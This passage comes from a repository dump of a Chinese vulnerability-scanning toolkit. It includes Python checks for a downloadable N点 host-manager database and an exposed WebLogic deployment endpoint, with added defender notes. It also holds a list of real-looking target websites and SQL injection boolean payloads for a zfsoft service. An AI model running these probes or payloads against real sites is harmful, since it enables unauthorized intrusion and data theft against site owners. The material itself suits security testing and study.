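        except Exception:
            cprint("[-] "+__file__+"====>连接超时", "cyan")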
41 |
if __name__ == "__main__":
    # Command-line use: the first argument is the URL or host name to check.
    warnings.filterwarnings("ignore")
    redis_unauth_BaseVerify(sys.argv[1]).run()
46 |
--------------------------------------------------------------------------------
/pocs/system/resin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/resin/__init__.py
--------------------------------------------------------------------------------
/pocs/system/sangfor/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/sangfor/__init__.py
--------------------------------------------------------------------------------
/pocs/system/smtp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/smtp/__init__.py
--------------------------------------------------------------------------------
/pocs/system/srun/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/srun/__init__.py
--------------------------------------------------------------------------------
/pocs/system/ssl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/ssl/__init__.py
--------------------------------------------------------------------------------
/pocs/system/tomcat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/tomcat/__init__.py
--------------------------------------------------------------------------------
/pocs/system/topsec/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/topsec/__init__.py
--------------------------------------------------------------------------------
/pocs/system/turbomail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/turbomail/__init__.py
--------------------------------------------------------------------------------
/pocs/system/vhost/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/vhost/__init__.py
--------------------------------------------------------------------------------
/pocs/system/vhost/npoint_mdb_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: N点虚拟主机管理系统V1.9.6版数据库下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-061151
6 | author: Lucifer
7 | description: N点虚拟主机管理系统默认数据库名#host # date#196.mdb。url直接输入不行,这里替换下#->%23 空格->=,即可下载数据库文件。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
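class npoint_mdb_download_BaseVerify:
    """Check whether the N点 virtual-host manager database file is downloadable.

    The check sends a HEAD request for the default database path (the file's
    header gives the default name as ``#host # date#196.mdb``, URL-encoded
    here) and reports a finding when the server declares the response to be a
    Microsoft Access file. Only headers are requested, so the database itself
    is not downloaded.

    Defender note: a finding means the application database is served as a
    static file. Moving it outside the web root, or denying requests for
    ``.mdb`` files at the web server, closes the exposure; renaming the file
    alone only hides it.
    """

    def __init__(self, url):
        """Remember the base URL (scheme and host) the check will be run against."""
        self.url = url

    def run(self):
        """Send one HEAD request and print a finding if an Access file is offered.

        Prints a red "[+]" line on a match and a cyan "[-]" line when the
        request fails; returns None in every case.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/host_date/%23host%20%23%20date%23196.mdb"
        vulnurl = self.url + payload
        try:
            # verify=False turns off TLS certificate validation, so the answer
            # may come from any host able to intercept the connection.
            req = requests.head(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() so a response without a Content-Type header is simply a
            # non-match instead of being reported as a connection failure.
            # Exact comparison: a value with extra parameters does not match.
            if req.headers.get("Content-Type") == "application/x-msaccess":
                cprint("[+]存在N点虚拟主机管理系统数据库下载漏洞...(高危)\tpayload: "+vulnurl, "red")

        # Exception instead of a bare except, so Ctrl-C and SystemExit still
        # stop the run. The message says "connection timeout" but is printed
        # for every kind of failure.
        except Exception:
            cprint("[-] "+__file__+"====>连接超时", "cyan")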
31 |
if __name__ == "__main__":
    # Command-line use: the first argument is the base URL to check.
    # All warnings are silenced, which also hides the warning normally
    # emitted for requests made with certificate verification turned off.
    warnings.filterwarnings("ignore")
    npoint_mdb_download_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/system/weblogic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/weblogic/__init__.py
--------------------------------------------------------------------------------
/pocs/system/weblogic/weblogic_interface_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: weblogic 接口泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: weblogic 接口泄露
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
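class weblogic_interface_disclosure_BaseVerify:
    """Check whether a WebLogic internal deployment endpoint is reachable.

    The check requests ``/bea_wls_deployment_internal/DeploymentService``
    without following redirects and reports an informational finding on any
    HTTP 200 response. The response body is not inspected, so a server that
    answers 200 for every path produces a false positive.

    Defender note: a finding means an internal management path is reachable
    from where the check was run. Presumably such paths should be blocked at
    the reverse proxy or firewall for untrusted networks; confirm against the
    vendor's hardening guidance.
    """

    def __init__(self, url):
        """Remember the base URL (scheme and host) the check will be run against."""
        self.url = url

    def run(self):
        """Send one GET request and print a finding if the endpoint answers 200.

        Prints a green "[+]" line on a match and a cyan "[-]" line when the
        request fails; returns None in every case.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/bea_wls_deployment_internal/DeploymentService"
        vulnurl = self.url + payload
        try:
            # verify=False turns off TLS certificate validation, so the answer
            # may come from any host able to intercept the connection.
            # allow_redirects=False keeps a redirect to a login or error page
            # from being counted as a 200.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)

            if req.status_code == 200:
                cprint("[+]存在weblogic 接口泄露漏洞...(信息)\tpayload: "+vulnurl, "green")

        # Exception instead of a bare except, so Ctrl-C and SystemExit still
        # stop the run. The message says "connection timeout" but is printed
        # for every kind of failure.
        except Exception:
            cprint("[-] "+__file__+"====>连接超时", "cyan")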
32 |
if __name__ == "__main__":
    # Command-line use: the first argument is the base URL to check.
    # All warnings are silenced, which also hides the warning normally
    # emitted for requests made with certificate verification turned off.
    warnings.filterwarnings("ignore")
    weblogic_interface_disclosure_BaseVerify(sys.argv[1]).run()
37 |
--------------------------------------------------------------------------------
/pocs/system/zabbix/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/zabbix/__init__.py
--------------------------------------------------------------------------------
/pocs/system/zookeeper/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/zookeeper/__init__.py
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | bs4
3 | redis
4 | pexpect
5 | termcolor
6 | pymysql
7 | pymongo
8 |
--------------------------------------------------------------------------------
/scan/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/scan/__init__.py
--------------------------------------------------------------------------------
/target.txt:
--------------------------------------------------------------------------------
1 | http://www.mapintime.com/
2 | http://cms.rkang.cn/
3 | http://www.120bjgcw.com/
4 | http://www.szbaoshan.com/
--------------------------------------------------------------------------------
/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------